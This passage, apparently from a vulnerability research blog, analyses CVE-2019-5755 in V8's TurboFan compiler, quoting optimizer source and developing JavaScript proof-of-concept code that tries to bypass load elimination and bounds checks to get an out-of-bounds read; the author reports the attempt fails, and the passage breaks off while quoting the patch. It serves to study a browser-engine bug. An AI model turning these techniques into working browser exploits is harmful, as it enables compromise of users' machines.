class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">TypedOptimization::ReduceSameValue</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(IrOpcode::kSameValue, node-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">  Node* <span class="type">const</span> lhs = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">0</span>);</span><br><span class="line">  Node* <span class="type">const</span> rhs = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">1</span>);</span><br><span class="line">  Type <span class="type">const</span> lhs_type = NodeProperties::<span class="built_in">GetType</span>(lhs);</span><br><span class="line">  Type <span class="type">const</span> rhs_type = NodeProperties::<span class="built_in">GetType</span>(rhs);</span><br><span class="line">  <span class="keyword">if</span> (lhs == rhs) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x,x) =&gt; #true</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Replace</span>(<span class="built_in">jsgraph</span>()-&gt;<span class="built_in">TrueConstant</span>());</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">Unique</span>()) &amp;&amp; rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">Unique</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:unique,y:unique) =&gt; ReferenceEqual(x,y)</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ReferenceEqual</span>());</span><br><span 
class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">String</span>()) &amp;&amp; rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">String</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:string,y:string) =&gt; StringEqual(x,y)</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">StringEqual</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:minus-zero,y) =&gt; ObjectIsMinusZero(y)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">0</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsMinusZero</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">MinusZero</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x,y:minus-zero) =&gt; ObjectIsMinusZero(x)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span 
class="number">1</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsMinusZero</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:nan,y) =&gt; ObjectIsNaN(y)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">0</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsNaN</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">NaN</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x,y:nan) =&gt; ObjectIsNaN(x)</span></span><br><span class="line">    node-&gt;<span class="built_in">RemoveInput</span>(<span class="number">1</span>);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">ObjectIsNaN</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (lhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">PlainNumber</span>()) &amp;&amp;</span><br><span 
class="line">             rhs_type.<span class="built_in">Is</span>(Type::<span class="built_in">PlainNumber</span>())) &#123;</span><br><span class="line">    <span class="comment">// SameValue(x:plain-number,y:plain-number) =&gt; NumberEqual(x,y)</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">simplified</span>()-&gt;<span class="built_in">NumberEqual</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Next, a brief look at how SpeculativeSafeIntegerSubtract and SpeculativeNumberSubtract nodes are generated. Both are created through the following call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::CreateGraph</span><span class="params">()</span></span></span><br><span class="line"><span class="function">  <span class="type">void</span> <span class="title">GraphBuilderPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::CreateGraph</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span 
class="title">BytecodeGraphBuilder::VisitBytecodes</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSingleBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSubSmi</span><span class="params">()</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildBinaryOpWithImmediate</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">              <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildBinaryOp</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                <span class="title">BytecodeGraphBuilder::TryBuildSimplifiedBinaryOp</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                  JSTypeHintLowering::LoweringResult <span class="title">JSTypeHintLowering::ReduceBinaryOperation</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                    Node* <span class="title">TryBuildNumberBinop</span><span class="params">()</span></span></span><br><span class="line"><span class="function">                      <span class="type">const</span> Operator* <span class="title">SpeculativeNumberOp</span><span class="params">(NumberOperationHint hint)</span></span></span><br></pre></td></tr></table></figure><p>The chain ends at the target function <code>SpeculativeNumberOp</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">const</span> Operator* <span class="title">SpeculativeNumberOp</span><span class="params">(NumberOperationHint hint)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">switch</span> (op_-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      <span class="keyword">case</span> IrOpcode::kJSSubtract:</span><br><span class="line">        <span class="keyword">if</span> (hint == NumberOperationHint::kSignedSmall ||</span><br><span class="line">            hint == NumberOperationHint::kSigned32) &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="built_in">simplified</span>()-&gt;<span class="built_in">SpeculativeSafeIntegerSubtract</span>(hint);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="built_in">simplified</span>()-&gt;<span class="built_in">SpeculativeNumberSubtract</span>(hint);</span><br><span class="line">        &#125;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">UNREACHABLE</span>();</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure><p>In TryBuildNumberBinop, TurboFan tries to read information about the operands from the feedback_vector. This operand information (the hint) takes one of the following five values:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// A hint for speculative number operations.</span></span><br><span class="line"><span class="keyword">enum class</span> <span class="title class_">NumberOperationHint</span> : <span class="type">uint8_t</span> &#123;</span><br><span class="line">  kSignedSmall,        <span class="comment">// Inputs were Smi, output was in Smi.</span></span><br><span class="line">  kSignedSmallInputs,  <span class="comment">// Inputs were Smi, output was Number.</span></span><br><span class="line">  kSigned32,           <span class="comment">// Inputs were Signed32, output was Number.</span></span><br><span class="line">  kNumber,             <span class="comment">// Inputs were Number, output was Number.</span></span><br><span class="line">  kNumberOrOddball,    <span class="comment">// Inputs were Number or Oddball, output was Number.</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The subtraction is treated as safe, and a SpeculativeSafeIntegerSubtract node is created, if and only if the hint is <code>NumberOperationHint::kSignedSmall</code> or <code>NumberOperationHint::kSigned32</code>; otherwise the conservative SpeculativeNumberSubtract node is created.</p></li><li><p>Finally, for reference, the <strong>ranges of some of the numeric types</strong>:</p><blockquote><p>See src/compiler/types.h in the source.</p></blockquote><ul><li><p>Some basic types</p><ul><li>OtherNumber (ON): $(-\infty, -2^{31}) \cup [2^{32}, \infty)$</li><li>OtherSigned32 (OS32): $[-2^{31}, -2^{30})$</li><li>Negative31 (N31): $[-2^{30}, 0)$</li><li>Unsigned30 (U30): $[0, 2^{30})$</li><li>OtherUnsigned31 (OU31): $[2^{30}, 2^{31})$</li><li>OtherUnsigned32 (OU32): $[2^{31}, 2^{32})$</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br></pre></td><td class="code"><pre><span class="line">  ON    OS32     N31     U30     OU31    OU32     ON</span><br><span class="line">______[_______[_______[_______[_______[_______[_______</span><br><span class="line">    <span class="number">-2</span>^<span class="number">31</span>   <span class="number">-2</span>^<span class="number">30</span>     <span class="number">0</span>      <span class="number">2</span>^<span class="number">30</span>    <span class="number">2</span>^<span class="number">31</span>    <span class="number">2</span>^<span class="number">32</span></span><br></pre></td></tr></table></figure></li></ul></li><li><p>Integral32: $[-2^{31}, 2^{32})$</p></li><li><p>PlainNumber: any floating-point number, excluding $-0$ and $NaN$</p></li><li><p>Number: any floating-point number, including $-0$ and $NaN$</p></li><li><p>Numeric: any floating-point number, including $-0$ and $NaN$, plus $BigInt$</p></li></ul><h2 id="四、漏洞利用">4. Exploitation</h2><blockquote><p>In theory this bug can be turned into an <strong>out-of-bounds read primitive</strong>, but in practice the exploit runs into a problem that I could not solve.</p><p>Even so, attempting to build the exploit is a good way to deepen our understanding of TurboFan.</p></blockquote><p>The initial PoC is:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>((trigger ? 
-<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>, -<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">return</span> idx;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">false</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><p>Turbolizer shows that, whatever argument is passed in, the SameValue node is <strong>folded directly</strong> into HeapConstant&lt;false&gt;, and <strong>idx is also false at run time</strong>. The two results agree, so the bug cannot be exploited this way.</p><p>Why is idx also false at run time? Once HeapConstant&lt;false&gt; has been generated, TurboFan drops the computation of idx altogether and uses the constant false:</p><p><img src="/2021/02/CVE-2019-5755/heapconstant_asm.png" alt="img"></p><p>What we <strong>want</strong> is that, when -0 is passed in (that is, when the argument is true), <strong>the SameValue node is typed as false at compile time but evaluates to true at run time</strong>. That mismatch would let us make TurboFan compute a wrong range. In other words, TurboFan must believe at <strong>compile time</strong> that SameValue is 0 while the <strong>run-time</strong> value is 1; multiplying that difference then yields an out-of-bounds array index.</p><blockquote><p><strong>Compile-time</strong> value: the value or range that TurboFan determines when typing the node, i.e. the result of static analysis.</p><p><strong>Run-time</strong> value: the value actually computed when v8 executes the JS program.</p></blockquote><p>So we must <strong>stop TurboFan from generating a HeapConstant&lt;false&gt; node for SameValue</strong>. That means the type of SameValue must <strong>not be computed precisely</strong> while any ConstantFoldingReducer before simplified lowering runs; the point at which the node is typed as a constant has to be delayed until <strong>after every ConstantFoldingReducer has run</strong>. Otherwise, as soon as a HeapConstant appears, the <strong>run-time</strong> value of idx is fixed to that constant and is never recomputed.</p><p>When, then, should SameValue be typed precisely? First, here is where the typer runs in the
pipeline:</p><ul><li>TyperPhase</li><li>TypeNarrowingReducer in LoadEliminationPhase</li><li>UpdateFeedbackType in SimplifiedLoweringPhase</li></ul><blockquote><p>The last two invoke the typer through the following macro (easy to miss at first glance):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DECLARE_CASE(Name)                               \</span></span><br><span class="line"><span class="meta">  case IrOpcode::k##Name: &#123;                              \</span></span><br><span class="line"><span class="meta">    new_type = op_typer_.Name(input0_type, input1_type); \</span></span><br><span class="line"><span class="meta">    break;                                               \</span></span><br><span class="line"><span class="meta">  &#125;</span></span><br><span class="line">      <span class="built_in">SIMPLIFIED_NUMBER_BINOP_LIST</span>(DECLARE_CASE)</span><br><span class="line"><span class="meta">#<span class="keyword">undef</span> DECLARE_CASE</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></blockquote><p>ConstantFoldingReducer runs in <code>TypedLoweringPhase</code> and <code>LoadEliminationPhase</code>, so the only option is to have SameValue typed precisely in <strong>SimplifiedLoweringPhase</strong>.</p><p>Note, however, that TypedOptimization in TypedLoweringPhase reduces SameValue once. We must keep it from turning the SameValue node into an ObjectIsMinusZero node, because that node is not typed in
SimplifiedLoweringPhase (it is only replaced, by an Int32Constant).</p><p>Putting these requirements together, TurboFan must not be able to determine, in any phase before EscapeAnalysisPhase, that the second operand of SameValue has type MinusZero. This is where a little escape analysis comes in (for the full picture see <a href="https://www.jfokus.se/jfokus18/preso/Escape-Analysis-in-V8.pdf">Escape-Analysis-in-V8</a>):</p><p><img src="/2021/02/CVE-2019-5755/escape_analysis_writing_field.png" alt="img"></p><p>In short, one of the things EscapeAnalysis can do is <strong>turn a LoadField operation into a read of a stack variable</strong>. In the phases before EscapeAnalysisPhase the LoadField node is still present, so the type of the loaded value is not yet known. My first modification of the PoC was therefore:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = &#123; <span class="attr">a</span>: -<span class="number">0</span> &#125;; <span class="comment">// needed for Escape Analysis (1)</span></span><br><span class="line">    <span class="keyword">let</span> wrongNum = (trigger ? 
-<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">let</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>(wrongNum, obj.<span class="property">a</span>);</span><br><span class="line">    <span class="keyword">return</span> idx + <span class="number">1</span>;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// needed for Escape Analysis (2)</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">2</span>; a++)</span><br><span class="line">    <span class="title function_">foo</span>(<span class="literal">false</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><blockquote><p>Note that Escape Analysis depends on the function's type feedback. If the target function has run only <strong>once</strong>, the analysis does very poorly and finds almost nothing useful; even the LoadField replacement described above does not happen. The function must therefore be executed several times before it is optimized.</p><p>The object targeted by Escape Analysis must also be declared with let or var; otherwise the LoadField node cannot be replaced, mainly because of scoping.</p></blockquote><p>Debugging shows, however, that LoadElimination (in LoadEliminationPhase) gets to the LoadField node first: obj.a is already replaced with -0 during LoadEliminationPhase. The relevant code is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">LoadElimination::ReduceLoadField</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  FieldAccess <span class="type">const</span>&amp; access = <span class="built_in">FieldAccessOf</span>(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">  Node* object = NodeProperties::<span class="built_in">GetValueInput</span>(node, <span class="number">0</span>);</span><br><span class="line">  Node* effect = NodeProperties::<span class="built_in">GetEffectInput</span>(node);</span><br><span class="line">  Node* control = NodeProperties::<span class="built_in">GetControlInput</span>(node);</span><br><span class="line">  AbstractState <span class="type">const</span>* state = node_states_.<span class="built_in">Get</span>(effect);</span><br><span class="line">  <span class="keyword">if</span> (state == <span 
class="literal">nullptr</span>) <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  <span class="keyword">if</span> (access.offset == HeapObject::kMapOffset &amp;&amp;</span><br><span class="line">      access.base_is_tagged == kTaggedBase) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="type">int</span> field_index = <span class="built_in">FieldIndexOf</span>(access);</span><br><span class="line">    <span class="keyword">if</span> (field_index &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">      <span class="keyword">if</span> (Node* replacement = state-&gt;<span class="built_in">LookupField</span>(object, field_index)) &#123;</span><br><span class="line">        <span class="comment">// Make sure we don&#x27;t resurrect dead &#123;replacement&#125; nodes.</span></span><br><span class="line">        <span class="keyword">if</span> (!replacement-&gt;<span class="built_in">IsDead</span>()) &#123;</span><br><span class="line">          <span class="comment">// Introduce a TypeGuard if the type of the &#123;replacement&#125; node is not</span></span><br><span class="line">          <span class="comment">// a subtype of the original &#123;node&#125;&#x27;s type.</span></span><br><span class="line">          <span class="keyword">if</span> (!NodeProperties::<span class="built_in">GetType</span>(replacement)</span><br><span class="line">                   .<span class="built_in">Is</span>(NodeProperties::<span class="built_in">GetType</span>(node))) &#123;</span><br><span class="line">            Type replacement_type = Type::<span class="built_in">Intersect</span>(</span><br><span class="line">                NodeProperties::<span class="built_in">GetType</span>(node),</span><br><span class="line">                NodeProperties::<span 
class="built_in">GetType</span>(replacement), <span class="built_in">graph</span>()-&gt;<span class="built_in">zone</span>());</span><br><span class="line">            <span class="comment">// Create the new node</span></span><br><span class="line">            replacement = effect =</span><br><span class="line">                <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">common</span>()-&gt;<span class="built_in">TypeGuard</span>(replacement_type),</span><br><span class="line">                                 replacement, effect, control);</span><br><span class="line">            <span class="comment">// Set its type</span></span><br><span class="line">            NodeProperties::<span class="built_in">SetType</span>(replacement, replacement_type);</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="comment">// Replace the node</span></span><br><span class="line">          <span class="built_in">ReplaceWithValue</span>(node, replacement, effect);</span><br><span class="line">          <span class="keyword">return</span> <span class="built_in">Replace</span>(replacement);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      state = state-&gt;<span class="built_in">AddField</span>(object, field_index, node, access.name, <span class="built_in">zone</span>());</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">UpdateState</span>(node, state);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>But LoadEliminationPhase contains a ConstantFoldingReducer, so the SameValue node still ends up replaced by a HeapConstant. We therefore have to get past the LoadElimination optimization and have EscapeAnalysis do the replacement instead.</p><p>After a good deal of trial and error I found a way around it. The modified PoC below differs from the previous one by a single, slightly odd console.log
call:</p><blockquote><p>I found this bypass by guesswork; making the code a little more complicated sometimes gets past certain optimizations for no obvious reason.</p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = &#123; <span class="attr">a</span>: -<span class="number">0</span> &#125;; <span class="comment">// needed for Escape Analysis (1)</span></span><br><span class="line">    <span class="keyword">let</span> wrongNum = (trigger ? 
-<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(obj.<span class="property">a</span> = -<span class="number">0</span> );     <span class="comment">// added to bypass LoadElimination</span></span><br><span class="line">    <span class="keyword">let</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>(wrongNum, obj.<span class="property">a</span>);</span><br><span class="line">    <span class="keyword">return</span> idx + <span class="number">1</span>;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// needed for Escape Analysis (2)</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">2</span>; a++)</span><br><span class="line">    <span class="title function_">foo</span>(<span class="literal">false</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><p>With this change LoadElimination is bypassed:</p><p><img src="/2021/02/CVE-2019-5755/loadelimination.png" alt="img"></p><p>Once EscapeAnalysisPhase has run, all the groundwork is in place:</p><p><img src="/2021/02/CVE-2019-5755/escape_analysis_show1.png" alt="img"></p><p>I then modified the code slightly, adding an array access, to see whether the CheckBounds node would be eliminated (the earlier code only computed the index):</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> arr = [<span class="number">0.1</span>, <span class="number">0.2</span>, <span class="number">0.3</span>, <span class="number">0.4</span>];</span><br><span class="line">    <span class="keyword">let</span> obj = &#123; <span class="attr">a</span>: -<span class="number">0</span> &#125;; <span class="comment">// needed for Escape Analysis (1)</span></span><br><span class="line">    <span class="keyword">let</span> wrongNum = (trigger ? -<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(obj.<span class="property">a</span>);     <span class="comment">// added to bypass LoadElimination</span></span><br><span class="line">    <span class="keyword">let</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>(wrongNum, obj.<span class="property">a</span>);</span><br><span class="line">    <span class="keyword">return</span> arr[idx * <span class="number">1337</span>]; <span class="comment">// try to read out of bounds</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// needed for Escape Analysis (2)</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">2</span>; a++)</span><br><span class="line">    <span class="title function_">foo</span>(<span 
class="literal">false</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); </span><br></pre></td></tr></table></figure><p>Turbolizer shows that the CheckBounds node has been eliminated:</p><p><img src="/2021/02/CVE-2019-5755/elimate_checkbounds.png" alt="img"></p><p>The generated assembly also looks fine:</p><blockquote><p>Calling convention of Builtin_SameValue: %rdx and %rax hold the left and right operands respectively.</p></blockquote><p><img src="/2021/02/CVE-2019-5755/exp_asm.png" alt="img"></p><p>This looks as though it should read out of bounds, but when run it still returns the array element at index 0 (quite the letdown, TAT).</p><p>Stepping through the assembly of the compiled JS function in a debugger, I found that the variable wrongNum is <strong>truncated to an integer</strong> and then compared with 0x1:</p><blockquote><p>Use the <code>--trace-turbo</code> flag together with turbolizer to look up the memory address of the compiled function, and pair it with the built-in <code>%SystemDebug()</code> to make debugging easier.</p></blockquote><p><img src="/2021/02/CVE-2019-5755/problem_asm1.png" alt="img"></p><p>The culprit is the ChangeInt31ToTaggedSigned node:</p><p><img src="/2021/02/CVE-2019-5755/insertNode.png" alt="img"></p><p>This ChangeInt31ToTaggedSigned node is generated during Simplified Lowering and cannot be optimized away, so the exploit cannot be taken any further and has to stop here.</p><h2 id="五、后记">5. Afterword</h2><ul><li><p>For details of the patch, see <a href="https://chromium.googlesource.com/v8/v8.git/+/e3c923962677908c183121644c945777cdb31570">here</a>.</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Type OperationTyper::SpeculativeSafeIntegerSubtract(Type lhs, Type rhs) &#123;</span><br><span class="line">  Type result = SpeculativeNumberSubtract(lhs, rhs);</span><br><span class="line">  // If we have 
